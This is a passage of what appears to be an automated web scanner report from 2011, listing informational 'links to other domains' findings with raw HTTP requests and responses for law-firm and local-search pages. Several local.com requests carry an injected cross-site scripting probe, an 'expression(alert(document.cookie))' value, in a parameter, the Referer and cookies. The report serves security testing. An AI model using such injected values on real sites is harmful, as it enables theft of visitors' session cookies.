           <img src="/img/banners/ribbon/Ribbon.jpg" alt="" height="45" width="750" border="0" />
...[SNIP]...
</strong> an independent news organization that focuses on the inner workings of the U.S. Department of Justice, the Attorney General Office, U.S. Attorney news and <a href="http://www.mainjustice.com/justanti-corruption-a-new-site-from-main-justice/">white-collar crime, corruption and compliance law</a>
...[SNIP]...
<td align="center" bordercolor="#DDD1C3">
                                   

    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab##version=7,0,19,0" width="180" height="62" accesskey="f" tabindex="40" title="Fulbright &amp; Jaworski Events">
<param name="movie" value="/fjLib/media/flash/events/eventsBanner_03.swf" />
...[SNIP]...

15.24. http://www.hoganlovells.com/newsmedia/newspubs/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/newspubs/detail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /newsmedia/newspubs/detail.aspx?news=1779 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:30 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1186; path=/
Set-Cookie: PortletId=1197201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 100194


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<li><a href="http://www.addthis.com/bookmark.php" class="addthis_button" style="text-decoration:none;">(+)</a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

15.25. http://www.hoganlovells.com/practiceAreas/area.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /practiceAreas/area.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /practiceAreas/area.aspx?firmService=1720 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1076; path=/
Set-Cookie: PortletId=14201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 96298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<li><a href="http://www.addthis.com/bookmark.php" class="addthis_button" style="text-decoration:none;">(+)</a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0009/8877.js"> </script>
...[SNIP]...

15.26. http://www.info.com/washington%20dc%20law%20firms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /washington%20dc%20law%20firms?cb=27&cmp=3917/x22 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Wed, 19 Jan 2011 16:44:23 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455463+last_cmp+3917%2Fx22+engineset; expires=Sun, 18-Jan-2037 23:52:19 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53357

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo
...[SNIP]...
<li><a href="http://www.yellowbook.com/" onMouseOver="this.style.color='#583B0C'"; onMouseOut="this.style.color='';" onClick="return c('http://www.yellowbook.com/','Yellow_Pages',event,'http://www.yellowbook.com/');" title="Find a business">Yellow Pages</a>
...[SNIP]...
<td nowrap valign=bottom><a href="http://www.zenya.com/?cmp=4109" target="new" style="background:#fff999;padding:1px 10px;text-decoration:underline">Drive more traffic to your site</a>
...[SNIP]...
<map id=se name=se><area shape=rect coords="0,0,58,25" href="http://www.google.com/search?q=washington+dc+law+firms" target="_blank" title="Google" /><area shape=rect coords="70,0,174,25" href="http://search.yahoo.com/search?p=washington+dc+law+firms" target="_blank" title="Yahoo! Search" /><area shape=rect coords="185,0,247,25" href="http://www.bing.com/?q=washington+dc+law+firms" target="_blank" title="Bing" /><area shape=rect coords="260,0,292,25" href="http://www.ask.com/web?q=washington+dc+law+firms" target="_blank" title="Ask" /><area shape=rect coords="306,0,356,25" href="http://search.about.com/fullsearch.htm?terms=washington+dc+law+firms" target="_blank" title="About" /></map>
...[SNIP]...
<noscript><img src='http://info.intelli-direct.com/e/t3.dll?280&0&%20&qcat%3DWeb%26vendor%3Dinfousreport10%26skw%3Dwashington+dc+law+firms%26itkw%3Dwashington+dc+law+firms&iREGQry&iSale&0&0&0&0&0&0&%20&1500&%20&0' height=1 width=1 border=0></noscript>
...[SNIP]...

15.27. http://www.kasimer-ittig.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasimer-ittig.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?pu=1 HTTP/1.1
Host: www.kasimer-ittig.com
Proxy-Connection: keep-alive
Referer: http://www.kasimer-ittig.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hosting_session=a1c6c619be8fce3f56cf4f0f6a33f4ee782f8ca8

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 17:55:34 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=52ceda8c57e646bed823849dab562c970a8346a5; path=/; expires=Wed, 19-Jan-2011 18:55:34 GMT
Content-Length: 36188
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<meta name="robots" content="noindex,nofollow">

<link rel='stylesheet' type='text/css' href='http://static-vip.school9.com/images/plain/styles/styles.css' />
</head>
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
<div class="sLeft"><img src="http://static-vip.school9.com/images/plain/i/logo.jpg" width="37" height="49" /></div>
...[SNIP]...

15.28. http://www.local.com/business/v3/js/globalbusiness_3_5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/v3/js/globalbusiness_3_5.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4030_27585 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=41906
Expires: Thu, 20 Jan 2011 05:33:03 GMT
Date: Wed, 19 Jan 2011 17:54:37 GMT
Connection: close
Content-Length: 404232


ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
<div id='centerButton'><img id='centerIcon' src='http://maps.ucla.edu/campus/help/images/i_zoomin.png' width='16' height='16'/></div>
...[SNIP]...

15.29. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 858
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=2;tile=2;city=dallas_tx;sz=300x250;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.30. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 861
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.31. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 858
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=3;tile=3;city=dallas_tx;sz=160x600;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=3;tile=3;city=dallas_tx;sz=160x600;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.32. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 864
Vary: Accept-Encoding
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Content-Length: 864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=11;tile=11;city=dallas_tx;sz=300x250;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=11;tile=11;city=dallas_tx;sz=300x250;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.33. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&sz=491x223&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647; session_start_time=1295459728272; k_visit=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 852
Date: Wed, 19 Jan 2011 17:54:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=;tile=;city=dallas_tx;sz=491x223;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=;tile=;city=dallas_tx;sz=491x223;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.34. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647; session_start_time=1295459728272; k_visit=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 861
Vary: Accept-Encoding
Date: Wed, 19 Jan 2011 17:54:40 GMT
Connection: close
Content-Length: 861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp;dcopt=ist;kw=law_offices;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1295459726173?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp;dcopt=ist;kw=law_offices;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1295459726173?" border="0" alt="" /></a>
...[SNIP]...

15.35. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&sz=170x150&ord=1295459726173&k=law+offices&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
